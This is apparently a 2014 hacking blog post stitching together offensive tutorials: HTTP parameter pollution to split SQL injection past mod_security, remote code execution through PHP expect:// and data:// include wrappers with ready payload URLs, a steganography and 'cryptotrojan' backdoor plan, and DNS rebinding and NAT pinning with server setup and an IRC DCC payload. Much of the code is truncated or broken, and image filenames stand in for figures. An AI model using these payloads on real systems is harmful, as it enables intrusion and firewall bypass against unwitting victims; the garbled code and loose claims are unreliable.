Monday, June 16, 2014

IDS & WAF Evasion using HTTP Parameter Pollution

Introduction

Didn't really spot any tutorials on HPP around here so I decided to throw some information on the subject. Parameter pollution occurs when there are multiple POST/GET parameters in the URL. The idea is to re-declare a parameter and alter its original value. Both, server-side and client-side attacks are feasible depending on the server back-end. Here I'm going to present HPP as an overall method of exploitation, WAF bypassing (and in particular mod_security) and basic IDS evasions triggered by parameter pollution. Now let's get to it.

Parameter Pollution


Since the idea of HPP is to re-use parameters and rewrite their initial value, let's see a primitive example of that. Suppose we have the following URL:
http://example.com/index.php?page=profile.php&username=Keeper
In this case, we can rewrite the username parameter with another value and access the profile of another member (of course not authorized as him..).
http://example.com/index.php?page=profile.php&id=1&username=Keeper&username=Divine
In PHP, we'll have the first parameter ignored and the second one executed. That's probably the case in most back-ends that implement PHP. Take this code for an instance:
$identifier = $_GET;
$user_profile = $_GET;
Since code is read from top to bottom whenever we append a new value to a variable that is displayed in the URL with $_GET, we end up with its second value because what basically happens is the following:
$identifier = $_GET;
$user_profile = $_GET; // bears the initial value of 'Keeper'
$user_profile = $_GET; // bears the second value of 'Divine'
However, in ASP/ASP.NET things are different. Repetitive parameters carrying the same name are concatenated and delimited by a comma into an array. This is the main reason why we can also apply server-sided attacks like all famous SQLi and chances for a lot more. A basic execution of SQL through HTTP parameter pollution is the following example:
http://example.com/profile.aspx?username=UNION SELECT ALL 1,2&username=3,4&username&5,6 FROM..
As this is all being temporary stored in an array, we get the payload in its original 'form' executed in the same way through appending partial payloads to the variable that we are polluting. Alternatively, there are a lot of ways to send the HTTP request. Except through the URL, we can establish a connection through a raw socket in the following way:
<?php
error_reporting(0);

$request = "
POST /index.aspx?username=UNION SELECT ALL 1,2&&username=3,4&username&5,6\r\n
Host: example.com\r\n
Cookie: 7,8,9--
Accept: */*\r\n";

$urltarget = $_POST;

$socket = fsockopen($urltarget);
fwrite($socket,$request);
$received = fread($socket,1024*1024);
echo $received;

?>
The socket establishes a connection to the target and returns the status of the request for confirmatory reason. Firstly, we define the headers under the variable $request. Then we specify that the target URL should be a POST value of a form supplied input (you can put the three lines of HTML in order to visualize that or neglect the usage of $_POST and just use the URL directly). Then we establish the actual connection with the function fsockopen() and fwrite(). We store the result under the variable $received which is receiving the request with 1MB of size (just to make sure we receive the whole of it).

Our overall request is:

POST /index.aspx?username=UNION SELECT ALL 1,2&&username=3,4&username&5,6\r\n
Host: example.com\r\n
Cookie: 7,8,9--
Accept: */*\r\n";
Modsecurity
Where the initial occurrence of the parameter is concatenated with the following values of the same parameter which thus results in our query executed in its entire content. Same could be applied against modsecurity. Suppose we have the following filters in our httpd.conf file that mitigate possible SQLi attacks:
SecFilter "delete:space:+from"
SecFilter "insert:space:+into"
SecFIlter "select.+from"
Using the ordinary payload for the finding of the tables with order by will most probably throw a 406 status code which stands for 'Not Acceptable' or in other words that is content generated for the sake of doing a particular job but not to be a reachable resource. It is defined with a constant in the source of modsecurity:
#define LEVEL_400 19
...
"406 Not Acceptable",
...
Basically, we can obfuscate any payload using parameter pollution and split it between the multiple instances of the parameter targeted. Now let's see how we can mitigate such parameter re-declaration:
As simple as that, we obtain the number of unique parameters and the number of total/all parameters. In the case when unique ones are less than the total, we append the result to a variable that would later on output/throw an error/exception for multiple parameters specified. Of course, we could secure/filter that in a much better way but this is an example just to get you going as to how we can countermeasure HPP. Aside from that, there are a lot of other vulnerabilities to be exploited:

  • First order HPP or Reflected HPP
- Parameters containing source attributes
  • Second order HPP or Stored HPP
- Parameters containing mainly href tags
  • Third order HPP or DOM Based HPP
- Additional, non-existing parameter addition

But since server-side ones are affecting the server the most, who'd need any client-side exploits if SS is feasible? They are all nearly as self-explanatory as any other basic client-side attack so there is practically no need to introduce every single one of them independently. Use your brain/logic.

Remote Code Execution Through PHP Wrappers

Since I've not seen some of these methods covered around here (except for php://filter and php://input), I decided to put up some material on 'em. Basically, they are more than self-explanatory but I still feel the need to tutorialize the process. First of all, in order to execute anything, you'd need to comply with the following conditions:
  • $_GET parameter
- Which we'll be passing the payload to
  • Version of PHP
- 4.3+ for expect://
- 5.2+ for data://

  • allow_url_include function enabled
- In order to inject through the parameter

php://expect
The expect:// wrapper is not enabled by default as it's an extension from the PECL package (consider it installed for now). The syntax it accepts is:
expect://[command]
Consider this small snippet running on the backend:
<?php

include $_GET;
//..
?>
Now we can pretty much run everything php-valid through it. so take the following URL for instance:
http://example.com/Keeper.php?page=expect://id

php://data
The data:// wrapper bears the same concept. Syntax followed:
data://text/plain;base64,[command encoded in base64]
or we can simply:
data://text/plain,[command]
We'll take under account that we'll be using the above inclusion of the $_GET parameter so there be two possible scenarios:
http://example.com/Keeper.php?page=data://text/plain;base64,JTNDJTNGc3lzdGVtJTI4JTI3aWQlMjclMjklM0IlM0YlM0U=
http://example.com/Keeper.php?page=data://text/plain,<?system('id');?>
In case of a WAF, filtering out code that is after the wrapper as in the last examples, we can use parameter pollution to pass/split our payload into two parts, resulting in both parameters being concatenated and separated by a comma likewise:
http://example.com/Keeper.php?page=data://text/plain&page=<?system('id');?>

eLSB Stegano+ Asymmetric Backdoors in Kleptography

7ia5fRa.png

Been quite some time since I last posted something stego oriented so here it goes. In this one I'm gonna explain a bit of in-depth steganography (as a matter of fact LSB shifting is considered a novice stage but not in the case of the tutorial) and sketchily go over basic kleptography aspects as well as cryptovirology ones as well. The tutorial is somewhat related to my old MLE one but with more advanced and major concepts being implemented in comparison to it. I had a notion of combining everything together and forming a unique tool or rather a virus but it's too complex for me so I'll just break down the information into different topics and sum it up in a single project that includes all the below listed stuff. As a matter of fact here's what I am gonna layout in it:

[*] — Multiple hybrid layers (concealment)
[*] — Steganography (enhanced LSB shifting)
[*] — Kleptography (asymmetric backdoors)
[*] — Cryptovirology (cryptotrojans)
[*] — Python
[*] — Esoteric language (Brainfuck/INTERCAL)
[*] — Vigenere cipher
[*] — Self-modifying source
[*] — Polymorphism
[*] — 2D models & Spectrums
[*] — Temporal frequency analyses
[*] — Graphical schemes (graphs)
[*] — Datamatrix/QRcodes

DJZfByo.png

Unlike the previous tutorial on this, here we're gonna develop a quintuple layer. The idea is to cover the above mentioned includes and especially the kleptographic attack where we're gonna spawn an asymmetric backdoor. It's in fact a monolayer but I'm gonna divide it into several sub-levels. We're gonna plant our cryptotrojan in a subliminal channel within the last sub-layer and then the next layer will take care of any eavesdropping or detection as a whole followed by three more for extra security and finalizing with a noised multi-pixel image. Here's a scheme of what each of them will represent:

jnuLyNa.png

pf7rXcI.png

So before we start lemme just mention the abbreviation of LSB which stands for least significant bit (this is basically the last bit in the sequence - rightmost). The fact that I wanted to meddle LSB steganography in this tutorial is mainly due to the fact that it's quite often mistaken with quantum steganography and images with a high level of noise. I myself had trouble solving a mission on HTS which has the same layer in the first place. The method I'm gonna apply is known as enhanced LSB shifting. The idea here is that each pixel is being replaced with a different value and hence makes the image totally unrecognizable. It is called enhanced because we're eliminated the high-level bits for every pixel except for the last LSB one and this is the case where we can most often evaluate the layer by looking into the structure of an image and following let's say an IDAT of 9 blocks, last LSB will be either smaller or equal to the previous bits (rarely equal in fact) which means that the previous ones have been altered and there's literally no room for the last LSB.

Gh5l1H6.png

One of the few techniques that can be used to detect eLSB steganography (and actually differentiate it from quantums) is statistical analyses. The most famous of which is the chi-square attack. There are a few tools to perform such analysis. I'm gonna use a Java implementation of one of them (not written by me). The first chi-square graph is the output of the analysis made on the enhanced image and the one below it - on the non-enhanced. For the record, the chi-square is calculated on 24-bit .BMPs. It's also known as steganalysis.

MqKRMja.png
Lemme quote the author of the tool as to what the different curves represent:
The program will output a graph with two curves. The first one inred is the result of the chi-square test. If it's close to one, than the probability for a random embedded message is high. So, if there is a random message embedded, this green curve will stay around 0.5. On the graph network, every vertical blue line represents 1 kilobyte of embedded data.
This is a sample representation of how the LSBs are being enhanced and set to either 255 or 0. Basically, the noise level depends on how much data we want to steganography and of course the size of the image, the color capacity etc.

MHYOxo7.png

Below is a histogram of the image. The blue initiates with a high value and then settles to a certain level. Whenever something like this occurs after you analyses, you could be nearly certain that there is something steganographied. Magically said, there is somewhat 70%+ in which I've found something in an image after a histogram analysis which outputs such results (especially the heightened presence of one of the RGB values).
8CbHFpa.png
Here's a Java chi-square class. I've used this one to represent the output of the steganalysis above. Here is a direct link to the .jar if you happen to need it for testing purposes only and not going through the code.

Code:
public double[] getExpected() {
    double[] result = new double[pov.length / 2];
for (int i = 0; i &lt; result.length; i++) {
    double avg = (pov[2 * i] + pov[2 * i + 1]) / 2;
    result = avg;
}
    return result;
}
public void incPov(int i) {
    pov++;
}

public long[] getPov() {
    long[] result = new long[pov.length / 2];
        for (int i = 0; i &lt; result.length; i++) {
            result = pov[2 * i + 1];
}

return result;

Frankly speaking there is a lot of software for embedding and extracting data but none is actually efficient when it comes to reversing the process. In this case the only possible way to reverse it will be to pull the least significant bit from every pixel channel, group them into words of 8 bits and convert back to text but that'd only be possible if we had any clue on which pixels have been altered (which we do not possess).
qiFjUjr.png

But let's say there is some sound or whatever audio file meddled. If you're good enough with steganography you could mix up both eLSB and audio rendering of an image and come up with an incredibly secure layer. Consider we have a file called fuke.wav which is somewhat altered and has some data within it. One of the ways to check for anything specific or whatever is to put the file under a frequency analysis and see whether there is something worth pursuing. First let's see a temporal analysis alongside a TFFT. Actually, the only difference bettwen a FFT and a temporal analysis is that the TFFT studies both the time and frequency of the signal while the FFT one only the signal itself (in other words we need to define a spectrum in order to see the temporal frequencies).
1RR0oPC.png
If that doesn't suit you, you can use sox for Linux boxes and generate a similar spectrum. Note that sox works only with .wav files (which is pretty much the extension that most software worships). Now to output a spectrum we do the following:


sox fuke.wav -n spectrogram

You may have to use a converter like ffmpeg or similar to alter the extension if you have previously generated a different one than .wav. And so we end up with the following:

Yfvg5Aa.png
Similar to that spectrogram are the following. The first one of which is with a dBV^2 scale on a 1024-bit window at 85%+- and the second one a linear scale and a 2048-bit window at 90%+ with a log bin. Quite better visible as you can plainly see. Same would refer if we manage to scale the sox spectrogram and manipulate it as best as we can but I don't think sox offers such possibilities.
88BQ9B5.png
Ok, so much for our first layer - four more to go. Now let's get to the next one which is the datamatrix.

sJ2wLgC.png
Let's start off with a bit of a challenge walkthrough so that we can get the the essence of this layer. So considering we have the following PHP file:
So here we are supposed to have something embedded. First of all this is a normal image file just formatted into PHP, so let's save it as .PNG for instance and see what we come up with.
1Js3II4.png
Using a converter we end up with the following string which is in fact a polyalphabetic substitution cipher (vigenere in this case).

dtsfwqutisvqtesymkuvabbujwhfecuvlshwopcyeghguywjvlaibflcacyahckyqvypjntfhihgtvyxeqakjwouldltuiuhbhjumgkxuugqahvwhotduqtahcknheypjetxpvlhxtlrpjagyjzcgijgfjmcupsslkzpuxegaillytlfbygeptzjtuzlvlwkzdznxqwpabbe

There are lots of applications for 1D barcodesPDF417datamatrixesQRs and whatnot. So far this one does the job the best for me.

XQHRYnM.png
Let's start off with the source. So far it's not polymorphic just basic encryption functions:
http://pastebin.com/raw.php?i=GErb6dm9
Little bit of background. Vigenere is a polyalphabetic cipher. Meaning that all attacks against such substitutions are applicable against it as well. I won't be explaining how to crack a vigenere since that's quite easily findable on the web. Anyway one of the key things is to estimate the key length. Below are the steps you need to take to manually crack a vigenere.


1. Find long repeated sequences
2. Find often repeated sequences
3. Count the distances between the repeats
4. Work out which factors are common among these distances
5. Start by assuming a plausible keyword length and write down each letter on the position
6. Analyze the letters as if it were a Caesar's Shift
7. The current letter of the keyword will be the first letter of the Caesar's Shift cipher alphabet used

8. Repeat step 5 with the next position until you processed all letters or can make out the keyword

Those would include Kasiski examination and a lot of other cryptanalyses. I won't be narrating Phizo's words so here is what he advised me when I sought his help:
Polymorphism is dependent on the key alone, in your example. Notice that the ciphertext will not produce polymorphic results when the key consists of nothing but the same characters. Also notice that the actual key will be visible in the plaintext if the first character is used for the entire key-length. Imagine the decimal value of a character in your plaintext, multiplied by a completely different random decimal value of a character. To make the key of any importance, you're going to want to make it depend on the key (such as t he one in the example you've shown), but with changes that will prevent the issues I pointed out earlier. For example, having the key be an operand in the multiplication along with random values, making the key and the resulting ciphertext polymorphic.
sbvWcOd.png

We'll start off with my favourite one - Malbolge. Practically, every esoteric language shouldn't be viewed that much from a programming point but rather a cryptographic one. Those languages are intentionally made sophisticated so that they hinder the writing of any code and obfuscate it immensely. Initially, they were invented to see how far can programming be extended and how many different ways of writing code can be implemented really. Malbolge is considered to be the hardest to write in simply because it's the most perplex of all of em. There are only three programs written in it ever since 1998 so yeah. We're not gonna write another one simply because we won't be able to but what the point here is to output the vigenere or whatever ciphertext we need using an esoteric language. So first off the 'accessories':

Interpreter:

http://pastebin.com/raw.php?i=nR5Ey90r
Assembler --> here

Basic Malbolge generator:
http://www.matthias-ernst.eu/malbolge/stringout.c

DNS Rebinding/PAT/NAT/NAT Pinning & Overloading

pZ4M6P8.png

I'd lie if I say I find it awkward that this hasn't been discussed here before. I'll go through the basic explanations so that you may know what we're gonna talk about. Basically this method enables us to access internal sources that are blocked to certain REMOTE_ADDRs any external traffic. Most of the cases a decent percent of the hacking attempts are hindered by this very restriction (whether it'd be .htaccess, ini files or entirely ranges of nullrouted IPs). Though this tutorial is entirely based on networking I still feel like posting it here since it does find a great deal of implementation in web applications. I won't explain what a DNS is so you'd better read some basic preliminary stuff before proceed reading. Along side DNS rebinding, I'll also include identical material like port address translation, NAT pinning and overloading etc.

bTurACU.png

In short DNS rebinding takes advantage of a low TTL response during which the host header is being altered and thus using client-sided code get authorized to access a certain intranet page. First thing your browser does when attempting to access a website is to connect to a DNS server in order to resolve the domain into an IP. Once the mapping is done, we append the Time To Live a value of 2 or less (not necessary to be exactly 2 or less actually). This means that whenever we try to access the page again, obviously after the TTL has expired, we cause a second DNS look-up combined with a client-sided code (take the all time favourite Javascript for example) to refresh the page and redirect to intranet page we wanna reach eventually. Consider the following request being made towards the server from our side (browser):

GET / HTTP/1.1

Host: www.example.com

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Keep-Alive: 100

Connection: keep-alive

The drawback of this method is that we need to lure the victim (which in our case is the person that has access to the intranet page since we're gonna use his IP address in order to access it) to visit a forged website that we have setup in advance. The victim's obviously gonna resolve the domain name so it's also obligatory that we setup a DNS server of our own in order to lower the TTL and force a rebind to another IP address. Meanwhile, I nullroute your IP address and you are no longer able to access my website so you'll be forced to rebind since you have been blackholed. This would mean that whenever he accesses the site he gets a TTL of 1 second after which we force him to refresh the page and forward a request from his REMOTE_ADDR towards the intranet resource within the internal network. Unfortunately, the browser would pretty much bust our attack since as you might guess the people that have developed them are aware of DNS rebinding as well. So the second DNS look-up won't be conducted. Here comes the time when meddle in another method that will bypass this. What we're gonna do is shut down the server which will cause a forced DNS re-look in order to resolve the domain. Let's have a look at how this is visually presented below.

L34uQDh.png

Now there are a couple of extra other things we should also have into consideration. The method is exploiting the DNS response as well as taking an advantage over the host header. Suppose that the very same host header is being validated by some reason and upon an invalid one specified as the return connection to the intranet page, no connection is established. There is also the case of an enabled SSL connection which upon a mismatch of the host header will also block our attempt to connect to the source. In this case we come to implement an XMLHttpRequest (which is an API for browser scripting languages) thus allowing us to circumvent the issue caused. Instead of narrating what the exploit is about, I'll just redirect you to read the official paper located here. As far as I am aware there is no feasible security measure against this attack so far. Now let's proceed with setting up our own DNS server.

Yi8ZuuL.png

First of all, in order to lower the DNS TTL we must setup a DNS server that would resolve the domain for our victim. We're gonna install a BIND under Ubuntu and configure it (which is pretty much just a list of servers which will be synchronized and the TTL which it'll be going through if any changes occur). First thing first. Installing bind.

sudo apt-get install bind9

Now I've took the liberty of borrowing the DNS configuration from Ubuntu's support forums. So first of all, editing the /etc/bind/named.conf.local file where we'll be specifying the DNS zones which are practically the domain names:

# This is the zone definition. replace example.com with your domain name

zone "example.com" {

type master;

file "/etc/bind/zones/example.com.db";

};



# This is the zone definition for reverse DNS. replace 0.168.192 with your network address in reverse notation - e.g my network address is 192.168.0

zone "0.168.192.in-addr.arpa" {

type master;

file "/etc/bind/zones/rev.0.168.192.in-addr.arpa";

};

And now the options file (in particular /etc/bind/named.conf.options) where we'll organizing the behavior of the DNS server upon an unsuccessful request:

forwarders {

# Replace the address below with the address of your provider's DNS server

123.123.123.123;

};

Time for the zone files (under /etc/bind/zones/example.com.db) where we specify the the TTL variable holding the value and actually the place where we modify it to a lower one (1 second in our case). Also keep in mind that each domain name has its own zone file. So:

// replace example.com with your domain name. do not forget the . after the domain name!

// Also, replace ns1 with the name of your DNS server

$TTL 1

example.com.      IN      SOA     ns1.example.com. admin.example.com. (

// Do not modify the following lines!

2006081401

28800

3600

604800

38400

)



// Replace the following line as necessary:

// ns1 = DNS Server name

// mta = mail server name

// example.com = domain name

example.com.      IN      NS              ns1.example.com.

example.com.      IN      MX     10       mta.example.com.



// Replace the IP address with the right IP addresses.

www              IN      A       192.168.0.2

mta              IN      A       192.168.0.3

ns1              IN      A       192.168.0.1

Now modify the reverse DNS zone file (/etc/bind/zones/rev.0.168.192.in-addr.arpa):

//replace example.com with yoour domain name, ns1 with your DNS server name.

// The number before IN PTR example.com is the machine address of the DNS server. in my case, it's 1, as my IP address is 192.168.0.1.

@ IN SOA ns1.example.com. admin.example.com. (

2006081401;

28800;

604800;

604800;

86400

)



IN    NS     ns1.example.com.

1                    IN    PTR    example.com

And finally restart the bind and alter /etc/resolv.conf to:

// replace example.com with your domain name, and 192.168.0.1 with the address of your new DNS server.

search example.com

nameserver 192.168.0.1

To check whether everything went as planned look-up a domain like so:


Now as for the Javascript part - I don't think there should be any explanation about it at all since the refresh and reconnection are just two functions. Nonetheless:

location.reload();

window.location='';

TxMPIMZ.png

Before looking into how we can exploit these, let's see how they work. So what is PAT and what is NAT? They stand for Port Address Translation and Network Address Translation. Though they have separate abbreviations, their purpose is nearly the same. The only difference is that PAT translates the internal network IPs into ports (as of its abbr). Basically, they are responsible for the transformation of the private addresses within your local network. For now, take a look at the scheme below which I'll explain thoroughly afterwards.

cLO9Gav.png

Suppose we have three computers connected to our router and their private addresses correspondingly (192.168.0.1192.168.0.2192.168.0.3). Now those IPs are internal and are treated invalid outside our network if not translated. What PAT and NAT do is they accept a packet from the PCs and according to it, translate the addresses. Consider, you're just accessing the website at 101.3.3.7 without any translation conducted beforehand. Take the red packet for example. It requests access over the router to the website at 101.3.3.7 specifying its IP, the IP it's gonna access, source port and destination port. Everything except for the local addressing can happen to be the same even though on rare occasions (meaning you'd need to match the same port that another machine hooked on your network has already went through which is kinda awkward since considering you do no have more than 5-10 at maximum devices connected on your router, you hardly will match an exact same port from 65550 at total). So the three of the computers will go out through a different source port in order not to cause a connection failure/conflict thus disturbing the network hierarchy.

Say the packets are following the below model:

Green packet:

Destination IP: 101.3.3.7

Source IP: 192.168.0.1

Destination Port: 80 (TCP/IP)

Source Port: 1337

Outgoing source port: 4127

Red packet:

Destination IP: 101.3.3.7

Source IP: 192.168.0.2

Destination Port: 80 (TCP/IP)

Source Port: 1337

Outgoing source port: 4128

Blue packet:

Destination IP: 101.3.3.7

Source IP: 192.168.0.3

Destination Port: 80 (TCP/IP)

Source Port: 1337

Outgoing source port: 4129

For the purpose of this, below I've visualized it within another scheme (correspondingly for the green, red and blue packets):

y75R3Zw.png

ijC8mzE.png

NAT overloading is basically the case I've given as example above. It practically means that we use more than one device to establish a connection through the router thus overloading the NAT by forcing it to translate more than one internal local address. Now that we know the basics, let's proceed with the exploitation. The exploit we're gonna look into is called NAT pinning which pretty much forces routers to port forward a port back to the victim's device. It's been discovered by Samuel Kamkar and up to now there hasn't been a feasible patch or precaution measures developed (at least not public). This could be applied against firewalls or common rule files, for example evading iptables that drop all incoming traffic from a selected IP address (considering its yours, being blackholed or whatever the reason).

iptables -A INPUT -s 101.3.3.7 -j DROP

iptables -A OUTPUT -d 101.3.3.7 -j DROP

Pretty much following an identical concept to what DNS rebinding has to offer with a few extra minor considerations. Once again we have a forged, pre-made page that has a hidden form which establishes a connection towards an IRC server on port 6667 and sends the value of:

PRIVMSG samy :\1DCC CHAT samy [ip in decimal] [port]\1\n

Afterwards, depending on the router (but I believe most which is kinda relative to say..) would open a local port by attempting to access a sub-protocol for the IRC in order for you to connect. Meanwhile, the traffic is directed to you in order to allow NAT traversal but considering you've already defined the port, you pretty much open that very same port number that you've specified thus allowing you to directly connect through that port accessing whatever you want to get your hands on.

There is also a Javascript script with a couple of functions serving as a PoC for this exploit written again by the developer of the method. I'll spoiler it here for those who want to attempt performing the exploit:

Show spoiler

vKdb0ik.png

Since every second thread around here is about issues caused by restricted access to intranet resources, I thought it's gonna be suitable at least for those that want to really attempt it. I personally only attempted the DNS rebinding by installing bind9 on my Ubuntu and though being functioning well enough I still cannot seem to be able to perform it as the theory states. My case is probably a mismatch of instructions so it doesn't necessarily mean that it won't work. There are enough PoCs on the web for those doubtful. Thanks for reading.